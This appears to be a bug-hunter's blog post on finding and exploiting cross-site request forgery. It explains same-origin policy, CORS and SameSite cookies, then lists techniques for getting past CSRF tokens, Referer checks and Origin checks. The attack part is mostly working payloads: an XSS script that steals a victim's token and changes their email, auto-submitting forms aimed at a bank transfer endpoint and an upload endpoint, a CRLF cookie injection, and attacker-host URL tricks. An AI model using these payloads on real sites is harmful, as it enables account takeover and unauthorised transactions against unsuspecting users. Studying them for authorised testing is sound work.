What is CSRF and How to Exploit?

CSRF Attack: attacker forces authenticated victim (cookie-based) to execute unwanted action that changes the state such as updating the profile, resetting the password, etc.

Intro

Hey hackers, my name is `mohammad amin` and you may know me as on the internet. today I wanna share my `CSRF Attack` knowledge base with you guys.

If you are not familiar with the basics of the web, the CSRF attack is more complicated than you think, so I suggest reading the section first and trying to fully understand the reason for using any payload and method.

🌟 I wanna thank who helped me to wrapped-up this awesome knowledge base.

Knowledge Base

What is Simple HTTP Request?

an http request that doesn't fire the cors preflight request security check.

Methods: GET || POST || HEAD
Content-Types: application/x-www-form-urlencoded || text/plain || multipart/form-data
Headers: Default http headers

What is Preflight Request?

a cors preflight request is an OPTIONS http request that checks to see if the cors protocol is understood and a server is aware using specific methods and headers.

What is SOP?

same-origin policy (sop) is another security mechanism that prevents the current dom from being read by another origin.

There are three solutions to remove sop restrictions:

• postMessage → sending and receiving messages between two different origins.

• JSONP → using <script> tag to transfer javascript object.

• Cross-Origin Resource Sharing → modifying sop by some special response header.

window.postMessage() is a browser object model (bom) method that helps developers to circumvent same-origin restrictions and it safely enables cross-origin communication between window objects.

What is CORS?

cross-origin resource sharing (cors) is an http header based browser mechanism that enables controlled access to resources located outside of a given domain.

origin is a combination of a scheme, hostname, and port (if specified) and those websites that have the combination of the same scheme, hostname, and port are considered as same-origin.

site is a combination of a scheme and eTLD+1. those websites that have the combination of the same scheme and eTLD+1 are considered as same-site.

Cookies Knowledge Base

a cookie is a data block limited to ~4kb and sets on the client's browser from the server and it's automatically attached to each client http header request by the browser. there is sth important to us that is named as SameSite field:

1. None → will be sent in all cross-origin requests it will be treated as normal (old) cookies.

2. Lax → will be sent only through GET requests in top window navigations such as <a> tag, window.open() ...

3. Strict → will be sent only when the user types the website in the url bar and presses enter.

Attack Surfaces

1. dashboard (crud any item or any access)

2. profile, client area, reset password (update profile data)

3. e-commerce (adding items to card)

4. tickets, support (request to transfer items, modify data, or deactivate the account)

5. admin panel (manipulate response and check admin panel functions in spa apps)

6. integration section (connect the user profile to the attacker’s oauth account)

7. developer section (generate a new token or revoke the previous one to make some damage)

Bypass Test Cases

HTTP Request

POST /path HTTP/2
Content-Type: application/x-www-form-urlencoded

_method=PATCH

-------------------------------------------------

GET /path?_method=PATCH HTTP/2
Content-Type: application/x-www-form-urlencoded

Customs are not always necessary

as we know, custom headers and some content types fire the cors preflight request security check. remove custom headers and change the content types then fire the request and see what is the result.

Listeners have different ideas

in content types and headers worlds, an attacker can provide two different values based on a mismatch in the checker's function:

application/json → text/plain; application/json
application/json → application/x-www-form-urlencoded; application/json

Remove or make it blank

programmers generate the csrf token but do not check if its actually present or not

Make it Null or undefined

it helps us to bypass badly implemented checker function

[2] Picking sth out from the pool

1. hold your token and check if it's valid to another user (canceling action)

2. used unauthorized endpoint to get csrf token from response

[4] Randomness is a show

1. generate a new token with the same length

2. put random chars at the beginning or at the end of the token

3. check if there are some static chars in the token and brute force dynamic ones or only using static part

4. take leverage of rainbow attacks or online databases to decode/decrypt the csrf token

Verb tampering is the magic

change the http request method and dismiss the csrf token parameter

Funny with Cross-Site Scripting (XSS)

as a lack of bypasses, we need to chain bugs. in the following poc, we extract the csrf token with GET request and put it into a POST request:

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse();
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

extract csrf token with html/css injection:

Referer Header

Stricly remove

remove the header from the request:

<meta name="referrer" content="no-referrer">

Ghosting the given url

don’t be disappointed, just crack the context:

http://attacker.tld/?param=http://white.tld/
http://whiteattacker.tld/
http://attackerwhite.tld/
http://white.attacker.tld/
http://white.tld.attacker.tld/
http://white.tldattacker.tld/
http://white.tld/redirect=http://attacker.tld/
http://attacker.tld/#http://white.tld

Origin Header

Edit and fire

set attacker.tld to the origin header and set the request.

attacker → Origin: https://attacker.tld
-----------------------------------------------------
victim → Access-Control-Allow-Credential: true
victim → Access-Control-Allow-Origin: https://attacker.tld || Access-Control-Allow-Origin: null

Make it Null

you can change the origin into null with an iframe:

<iframe src='data:text/html;base64,[BASE64 HTML]'></iframe>

https://trusted-origin.domain.tld/?xss=<script>CORS-ATTACK-PAYLOAD</script>

Cookies

In Nov 2019, a new canary release with lax-by-default cookies is out and this feature makes some difficulty for hackers. based-on our knowledge base, lax cookies will be sent only through GET requests in top window navigations but there is an exception for backward compatibility which help us to exploit outdated chrome browsers within 2 minutes.

at this point, you need to find a way to renew your cookie.

Funny with CRLF Injection

duplicate csrf token in cookie header:

<img src="https://redacted.tld/endpoint/?param=test%0d%0aSet-Cookie:%20csrf=fakecsrf" onerror="document.forms[0].submit();"/>

CVE

Nuc or look for

run nuclei or manually checks their technologies to find a valid cve.

iExploitation

JSON [HTML Form]

<form action="https://members.bankofdirectdefense.com/accounts/transfer" method="POST" enctype="text/plain">
  <input type="hidden" name="{\"data\": \"value\"" value="}" />
</form>

<script>
window.onload= function(){
  document.forms[0].submit();
}
</script>

<form action="https://redacted.tld/upload" enctype="multipart/form-data" method="POST" >
 <input type="hidden" name='\";name=file;filename=image.png;x' value="[BYTES]">
 <input type="hidden" name="ID" value="undefined">
 <input type="hidden" name="file" value="undefined">
</form>

<script>
window.onload= function(){
  document.forms[0].submit();
}
</script>

vulnerable application does not check the origin of the website that it receives the message from and incorporates the received data into its own application without proper validation.

Further Reading